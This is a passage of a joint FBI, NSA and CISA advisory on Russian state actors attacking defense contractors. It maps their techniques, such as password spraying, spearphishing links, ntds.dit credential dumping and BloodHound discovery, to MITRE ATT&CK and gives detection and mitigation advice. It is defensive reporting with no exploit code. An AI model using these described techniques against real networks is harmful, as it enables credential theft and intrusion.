[[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005>)]**\n\n| \n\nPhishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)]\n\nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]\n\n| Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]\n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\n| Threat actors logged into a victim\u2019s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database `ntds.dit`. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v10/techniques/T1078/004/>)]\n\nData from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v9/techniques/T1213/002/>)]\n\n| In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\nEmail Collection [[T1114](<https://attack.mitre.org/versions/v10/techniques/T1114>)]\n\n| In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system. \n \n**Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]**\n\n**Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v10/tactics/TA0008>)]**\n\n| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access. \n**Discovery [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]** | File and Network Discovery [[T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>)] | After gaining access to networks, the threat actors used BloodHound to map the Active Directory. \n**Discovery [[TA0007](<https://attack.mitre.org/versions/v10/tactics/TA0007>)]** | Domain Trust Discovery [[T1482](<https://attack.mitre.org/versions/v10/techniques/T1482/>)] | Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities. \n**Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]** | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target. \n \n### \n\n### Detection\n\nThe FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. _**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom._\n\n#### **Detect Unusual Activity**\n\n**Implement robust log collection and retention.** Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:\n\n * Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.\n * Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. _**Note:** for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)._\n\n#### **Look for Evidence of Known TTPs**\n\n * **Look for behavioral evidence or network and host-based artifacts** from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. \n * To detect use of compromised credentials in combination with a VPS, follow the steps below: \n * **Review logs for suspicious \u201cimpossible logins,\u201d** such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * **Look for one IP used for multiple accounts,** excluding expected logins.\n * **Search for \u201cimpossible travel,\u201d **which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). _**Note:** this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks._\n * **Evaluate processes and program execution command-line arguments** that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations. \n * **Review logs for unusual activity** in typically dormant accounts.\n * **Look for unusual user agent strings,** such as strings not typically associated with normal user activity, which may indicate bot activity.\n\n### Incident Response and Remediation\n\nOrganizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.\n\n * **Reset passwords for all local accounts. **These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. _**Note:** reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, wait 10 hours, and then follow with a second krbtgt password reset). The krbtgt password resets may take a long time to propagate fully on large AD environments. Refer to Microsoft\u2019s [AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>) guidance and automation script for additional information. [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)][[5](<https://github.com/microsoft/New-KrbtgtKeys.ps1>)]_\n * **Reset all domain user, admin, and service account passwords. **\n\n_**Note:** for guidance on evicting advanced persistent threat (APT) actors from cloud and enterprise environments, refer to CISA Analysis Report [Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/Microsoft 365 (M365) Compromise](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a>). Although this guidance was drafted for federal agencies compromised by the Russian Foreign Intelligence Service (SVR) via the [SolarWinds Orion supply chain compromise](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>), the steps provided in the Eviction Phase are applicable for all organizations crafting eviction plans for suspected APT actors._\n\n### Mitigations\n\nThe FBI, NSA, and CISA encourage all CDCs, with or without evidence of compromise, to apply the following mitigations to reduce the risk of compromise by this threat actor. While these mitigations are not intended to be all-encompassing, they address common TTPs observed in these intrusions and will help to mitigate against common malicious activity. \n\n#### **Implement Credential Hardening**\n\n##### **_Enable Multifactor Authentication_**\n\n * **Enable multifactor authentication (MFA)** for all users, without exception. Subsequent authentication may not require MFA, enabling the possibility to bypass MFA by reusing single factor authentication assertions (e.g., Kerberos authentication). Reducing the lifetime of assertions will cause account re-validation of their MFA requirements.[[6](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>)] Service accounts should not use MFA. Automation and platform features (e.g., Group Managed Service Accounts, gMSA) can provide automatic and periodic complex password management for service accounts, reducing the threat surface against single factor authentication assertions.[[7](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>)] \n\n##### **_Enforce Strong, Unique Passwords_**\n\n * **Require accounts to have strong, unique passwords.** Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n * **Enable password management functions**, such as Local Administrator Password Solution (LAPS), for local administrative accounts. This will reduce the burden of users managing passwords and encourage them to have strong passwords.\n\n##### **_Introduce Account Lockout and Time-Based Access Features_**\n\n * **Implement time-out and lock-out features** in response to repeated failed login attempts.\n * **Configure time-based access for accounts set at the admin level and higher. **For example, the Just-In-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable administrator accounts at the AD level when the account is not in direct need. When the account is needed, individual users submit their requests through an automated process that enables access to a system but only for a set timeframe to support task completion.\n\n##### **_Reduce Credential Exposure_**\n\n * **Use virtualization solutions on modern hardware and software** to ensure credentials are securely stored, and protect credentials via capabilities, such as Windows Defender Credential Guard (CredGuard) and Trusted Platform Module (TPM).[[8](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>)] Protecting domain credentials with CredGuard requires configuration and has limitations in protecting other types of credentials (e.g., WDigest and local accounts).[[9](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)][[10](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>)] CredGuard uses TPMs to protect stored credentials. TPMs function as a system integrity observer and trust anchor ensuring the integrity of the boot sequence and mechanisms (e.g., UEFI Secure Boot). Installation of Windows 11 requires TPM v2.0.[[11](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>)] Disabling WDigest and rolling expiring NTLM secrets in smartcards will further protect other credentials not protected by CredGuard.[[12](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>)][[13](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>)]\n\n#### **Establish Centralized Log Management**\n\n * **Create a centralized log management system. **Centralized logging applications allow network defenders to look for anomalous activity, such as out-of-place communications between devices or unaccountable login failures, in the network environment. \n * Forward all logs to a SIEM tool.\n * Ensure logs are searchable.\n * Retain critical and historic network activity logs for a minimum of 180 days. \n * **If using M365, enable Unified Audit Log (UAL)**\u2014M365\u2019s logging capability\u2014which contains events from Exchange Online, SharePoint online, OneDrive, Azure AD, Microsoft Teams, PowerBI, and other M365 services. \n * **Correlate logs, including M365 logs, from network and host security devices. **This correlation will help with detecting anomalous activity in the network environment and connecting it with potential anomalous activity in M365. \n\nIn addition to setting up centralized logging, organizations should:\n\n * **Ensure PowerShell logging is turned on. **Threat actors often use PowerShell to hide their malicious activities.[14] \n * **Update PowerShell instances to version 5.0 or later **and uninstall all earlier versions of PowerShell. Logs from prior versions are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities. \n * **Confirm PowerShell 5.0 instances have module, script block, and transcription logging** enabled.\n * **Monitor remote access/Remote Desktop Protocol (RDP) logs** and disable unused remote access/RDP ports.\n\n#### **Initiate a Software and Patch Management Program **\n\n * **Consider using a centralized patch management system.** Failure to deploy software patches in a timely manner makes an organization a target of opportunity, increasing its risk of compromise. Organizations can ensure timely patching of software vulnerabilities by implementing an enterprise-wide software and patch management program.[[15](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>)] \n * If an organization is unable to update all software shortly after a patch is released, **prioritize patches for CVEs that are already known **to be exploited or that would be accessible to the largest number of potential adversaries (such as internet-facing systems). \n * **Subscribe to [CISA cybersecurity notifications and advisories](<https://us-cert.cisa.gov/ncas>)** to keep up with known exploited vulnerabilities, security updates, and threats. This will assist organizations in maintaining situational awareness of critical software vulnerabilities and, if applicable, associated exploitation. \n * **Sign up for CISA\u2019s [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)**, including vulnerability scanning, to help reduce exposure to threats. CISA\u2019s vulnerability scanning service evaluates external network presence by executing continuous scans of public, static IPs for accessible services and vulnerabilities.\n\n#### **Employ Antivirus Programs **\n\n * **Ensure that antivirus applications are installed on all organizations\u2019 computers** and are configured to prevent spyware, adware, and malware as part of the operating system security baseline. \n * **Keep virus definitions up to date.**\n * **Regularly monitor antivirus scans.**\n\n#### **Use Endpoint Detection and Response Tools **\n\n * **Utilize endpoint detection and response (EDR) tools.** These tools allow a high degree of visibility into the security status of endpoints and can be an effective defense against threat actors. EDR tools are particularly useful for detecting lateral movement, as they have insight into common and uncommon network connections for each host. \n\n#### **Maintain Rigorous Configuration Management Programs **\n\n * **Audit configuration management programs **to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Having a robust configuration program hinders sophisticated threat operations by limiting the effectiveness of opportunistic attacks.[[16](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>)] \n\n#### **Enforce the Principle of Least Privilege**\n\n * **Apply the principle of least privilege. **Administrator accounts should have the minimum permissions they need to do their tasks. This can reduce the impact if an administrator account is compromised. \n * **For M365, assign administrator roles to role-based access control (RBAC)** to implement the principle of least privilege. Given its high level of default privilege, you should only use the Global Administrator account when absolutely necessary. Using Azure AD\u2019s numerous other built-in administrator roles instead of the Global Administrator account can limit assigning unnecessary privileges. _**Note:** refer to the Microsoft documentation, [Azure AD built-in roles](<https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles>), for more information about Azure AD. _\n * **Remove privileges not expressly required by an account\u2019s function or role. **\n * **Ensure there are unique and distinct administrative accounts** for each set of administrative tasks. \n * **Create non-privileged accounts for privileged users, **and ensure they use the non- privileged accounts for all non-privileged access (e.g., web browsing, email access).\n * **Reduce the number of domain and enterprise administrator accounts, **and remove all accounts that are unnecessary.\n * **Regularly audit administrative user accounts.**\n * **Regularly audit logs to ensure new accounts are legitimate users.**\n * **Institute a group policy that disables remote interactive logins,** and use Domain Protected Users Group.\n\nTo assist with identifying suspicious behavior with administrative accounts:\n\n * **Create privileged role tracking.**\n * **Create a change control process** for all privilege escalations and role changes on user accounts.\n * **Enable alerts on privilege escalations and role changes.**\n * **Log privileged user changes** in the network environment, and create an alert for unusual events.\n\n#### **Review Trust Relationships**\n\n * **Review existing trust relationships with IT service providers,** such as managed service providers (MSPs) and cloud service providers (CSPs). Threat actors are known to exploit trust relationships between providers and their customers to gain access to customer networks and data. \n * **Remove unnecessary trust relationships. **\n * **Review contractual relationships **with all service providers, and ensure contracts include: \n * Security controls the customer deems appropriate. \n * Appropriate monitoring and logging of provider-managed customer systems.\n * Appropriate monitoring of the service provider\u2019s presence, activities, and connections to the customer network.\n * Notification of confirmed or suspected security events and incidents occurring on the provider\u2019s infrastructure and administrative networks.\n\n_**Note: **review CISA\u2019s page on [APTs Targeting IT Service Provider Customers](<https://www.cisa.gov/uscert/APTs-Targeting-IT-Service-Provider-Customers>) and [CISA Insights: Mitigations and Hardening Guidance for MSPs and Small and Mid-sized Businesses](<https://cisa.gov/sites/default/files/publications/CISA%20Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>) for additional recommendations for MSP and CSP customers._\n\n#### **Encourage Remote Work Environment Best Practices**\n\nWith the increase in remote work and use of VPN services due to COVID-19, the FBI, NSA, and CISA encourage regularly monitoring remote network traffic, along with employing the following best practices._ **Note:** for additional information, see joint NSA-CISA Cybersecurity Information Sheet: [Selecting and Hardening Remote Access VPN Solutions](<https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF>)._\n\n * **Regularly update VPNs, network infrastructure devices, and devices used for remote work environments **with the latest software patches and security configurations.\n * **When possible, require MFA on all VPN connections. **Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, mandate that employees engaging in remote work use strong passwords.\n * **Monitor network traffic for unapproved and unexpected protocols.**\n * **Reduce potential attack surfaces by discontinuing unused VPN servers** that may be used as a point of entry by adversaries.\n\n#### **Establish User Awareness Best Practices**\n\nCyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI, NSA, and CISA recommend the following best practices to improve employee operational security when conducting business:\n\n * **Provide end user awareness and training. **To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and how they are delivered. Also, provide users with training on information security principles and techniques.\n * **Inform employees of the risks of social engineering attacks,** e.g., risks associated with posting detailed career information to social or professional networking sites.\n * **Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyber intrusion** to help quickly and efficiently identify threats and employ mitigation strategies.\n\n#### **Apply Additional Best Practice Mitigations**\n\n * **Deny atypical inbound activity from known anonymization services, **including commercial VPN services and The Onion Router (TOR).\n * **Impose listing policies for applications and remote access** that only allow systems to execute known and permitted programs under an established security policy.\n * **Identify and create offline backups for critical assets.**\n * **Implement network segmentation.**\n * **Review CISA Alert **[AA20-120A: Microsoft Office 365 Security Recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa20-120a>) for additional recommendations on hardening M365 cloud environments.\n\n### Rewards for Justice Program\n\nIf you have information on state-sponsored Russian cyber operations targeting U.S. critical infrastructure, contact the Department of State\u2019s Rewards for Justice Program. You may be eligible for a reward of up to $10 million, which the Department is offering for information leading to the identification or location of any person who, while acting under the direction or control of a foreign government, participates in malicious cyber activity against U.S. critical infrastructure in violation of the Computer Fraud and Abuse Act (CFAA). Contact (202) 702-7843 on WhatsApp, Signal, or Telegram, or send information via the Rewards for Justice secure Tor-based tips line located on the Dark Web. For more details, refer to [rewardsforjustice.net](<https://rewardsforjustice.net/terrorist-rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>).\n\n### Caveats\n\nThe information you have accessed or received is being provided \u201cas is\u201d for informational purposes only. The FBI, NSA, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, NSA, or CISA. \n\n### Contact Information\n\nTo report suspicious activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:cywatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:central@cisa.gov>). For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at (410) 854-4200 or [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). Defense Industrial Base companies may additionally sign up for NSA\u2019s free cybersecurity services, including Protective DNS, vulnerability scanning, and threat intelligence collaboration at [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>). \n\n### Appendix: Detailed Tactics, Techniques, and Procedures\n\n#### **Reconnaissance** [[TA0043](<https://attack.mitre.org/tactics/TA0043/>)]\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. The adversary is known for harvesting login credentials [[T1589.001](<https://attack.mitre.org/techniques/T1589/001>)].[[17](<https://attack.mitre.org/groups/G0007>)]\n\nID | **Name** | **Description** \n---|---|--- \nT1589.001 | Gather Victim Identity Information: Credentials | Adversaries may gather credentials that can be used during targeting. \n \n#### **Initial Access **[[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. For example, the adversary may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[18](<https://attack.mitre.org/groups/G0007>)] These specific actors obtained and abused credentials of domain [[T1078.002](<https://attack.mitre.org/techniques/T1078/002>)] and cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)].[[19](<https://attack.mitre.org/software/S0154/>)] The actors also used external remote services to gain access to systems [[T1133](<https://attack.mitre.org/techniques/T1133>)].[20] The adversary took advantage of weaknesses in internet-facing servers and conducted SQL injection attacks against organizations' external websites [[T1190](<https://attack.mitre.org/techniques/T1190>)].[[21](<https://attack.mitre.org/groups/G0007>)] Finally, they sent spearphishing emails with a malicious link in an attempt to gain access [[T1566.002](<https://attack.mitre.org/techniques/T1566/002>)].[22] \n\n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.002 | Valid Accounts: Domain Accounts | Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \nT1133 | External Remote Services | Adversaries may leverage external-facing remote services to initially access and/or persist within a network. \nT1190 | Exploit Public-Facing Application | Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. \nT1566.002 | Phishing: Spearphishing Link | Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. \n \n#### **Persistence **[[TA0003](<https://attack.mitre.org/tactics/TA0003>)]\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[23](<https://attack.mitre.org/groups/G0007>)] \n\nID | **Name ** | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Privilege Escalation** [[TA0004](<https://attack.mitre.org/tactics/TA0004>)]\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. The adversary obtains and abuses credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion [[T1078](<https://attack.mitre.org/techniques/T1078>)].[[24](<https://attack.mitre.org/groups/G0007>)] Specifically in this case, credentials of cloud accounts [[T1078.004](<https://attack.mitre.org/techniques/T1078/004>)] were obtained and abused.[[25](<https://attack.mitre.org/software/S0154/>)] \n\nID | Name | Description \n---|---|--- \nT1078 | Valid Accounts | Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. \nT1078.004 | Valid Accounts: Cloud Accounts | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. \n \n#### **Defense Evasion** [[TA0005](<https://attack.mitre.org/tactics/TA0005>)]\n\nDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. The adversary made its executables and files difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit [[T1027](<https://attack.mitre.org/techniques/T1027>)].[[26](<https://attack.mitre.org/software/S0410/>)] \n\n\nID | Name | Description \n---|---|--- \nT1027 | Obfuscated Files or Information | Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. \n \n#### **Credential Access **[[TA0006](<https://attack.mitre.org/tactics/TA0006>)]\n\nCredential Access consists of techniques for stealing credentials like account names and passwords. The adversary attempted to access or create a copy of the Active Directory (AD) domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights [[T1003.003](<https://attack.mitre.org/techniques/T1003/003>)].[[27](<https://attack.mitre.org/software/S0250/>)] The adversary also used a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials [[T1110.003](<https://attack.mitre.org/techniques/T1110/003>)].[[28](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1003.003 | OS Credential Dumping: NTDS | Adversaries may attempt to access or create a copy of the Active Directory domain database to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. \nT1110.003 | Brute Force: Password Spraying | Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. \n \n#### **Discovery **[[TA0007](<https://attack.mitre.org/tactics/TA0007>)]\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. The adversary enumerated files and directories or searched in specific locations of a host or network share for certain information within a file system [[T1083](<https://attack.mitre.org/techniques/T1083>)].[29] In addition, the adversary attempted to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain or forest environments [[T1482](<https://attack.mitre.org/techniques/T1482>)].[30] \n\nID | Name | Description \n---|---|--- \nT1083 | File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. \nT1482 | Domain Trust Discovery | Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. \n \n**Collection [[TA0009](<https://attack.mitre.org/tactics/TA0009>)]**\n\nCollection consists of both the techniques adversaries may use to gather information and the sources that information is collected from that are relevant to the adversary's objectives. The adversary leverages information repositories, such as SharePoint, to mine valuable information [[T1213.002](<https://attack.mitre.org/techniques/T1213/002>)].[[31](<https://attack.mitre.org/groups/G0007>)] \n\nID | Name | Description \n---|---|--- \nT1213.002 | Data from Information Repositories: SharePoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information. \n \n**Command and Control [[TA0011](<https://attack.mitre.org/tactics/TA0011>)]**\n\nCommand and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. The adversary chained together multiple proxies to disguise the source of malicious traffic. In this case, TOR and VPN servers are used as multi-hop proxies to route C2 traffic and obfuscate their activities [[T1090.003](<https://attack.mitre.org/techniques/T1090/003>)].[[32](<https://attack.mitre.org/groups/G0007>)] \n\n\nID | Name | Description \n---|---|--- \nT1090.003 | Proxy: Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies. \n \n### Additional Resources\n\n[1] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[2] NSA Cybersecurity Advisory: [Mitigating Recent VPN Vulnerabilities](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>), 7 October 2019. \n[3] NSA, CISA, FBI, NCSC Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>), 1 July 2021. \n[4] Microsoft Article: [AD Forest Recovery \u2013 Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>), 29 July 2021. \n[5] Microsoft GitHub: [New-KrbtgtKeys.ps1](<https://github.com/microsoft/New-KrbtgtKeys.ps1>), 14 May 2020. \n[6] NSA Cybersecurity Information: [Defend Privileges and Accounts](<https://media.defense.gov/2019/Sep/09/2002180330/-1/-1/0/Defend Privileges and Accounts - Copy.pdf>), August 2019. \n[7] Microsoft Article: [Group Managed Service Accounts Overview](<https://docs.microsoft.com/en-us/windows-server/security/group-managed-service-accounts/group-managed-service-accounts-overview>), 29 July 2021. \n[8] NSA Cybersecurity Information: [Leverage Modern Hardware Security Features](<https://media.defense.gov/2019/Sep/09/2002180345/-1/-1/0/Leverage Modern Hardware Security Features - Copy.pdf>), August 2019. \n[9] Microsoft Article: [Protect derived domain credentials with Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>), 3 December 2021. \n[10] Microsoft Article: [Windows Defender Credential Guard protection limits](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-protection-limits>), 3 December 2021. \n[11] Microsoft Article: [Windows 11 requirements](<https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements>), 30 November 2021. \n[12] Microsoft Blog Post: [The Importance of KB2871997 and KB2928120 for Credential Protection](<https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/the-importnace-of-kb2871997-and-kb2928120-for-credential/ba-p/258478>), 20 September 2021. \n[13] Microsoft Article: [What\u2019s New in Credential Protection](<https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/whats-new-in-credential-protection>), 7 January 2022. \n[14] NSA Cybersecurity Factsheet: [PowerShell: Security Risks and Defenses](<https://www.iad.gov/iad/library/ia-guidance/security-tips/powershell-security-risks-and-defenses.cfm>), 1 December 2016. \n[15] NSA Cybersecurity Information: [Update and Upgrade Software Immediately](<https://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update and Upgrade Software Immediately.docx - Copy.pdf>), August 2019. \n[16] NSA Cybersecurity Information: [Actively Manage Systems and Configurations](<https://media.defense.gov/2019/Sep/09/2002180326/-1/-1/0/Actively Manage Systems and Configurations.docx - Copy.pdf>), August 2019. \n[17] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[18] MITRE Groups: [APT28](<https://attack.mitre.org/groups/G0007>), 18 October 2021. \n[19] MITRE Software: [Cobalt Strike](<https://attack.mitre.org/software/S0154/>), 18 October 2021. \n[20] Based on technical information shared by Mandiant. \n[21] MITRE Groups: 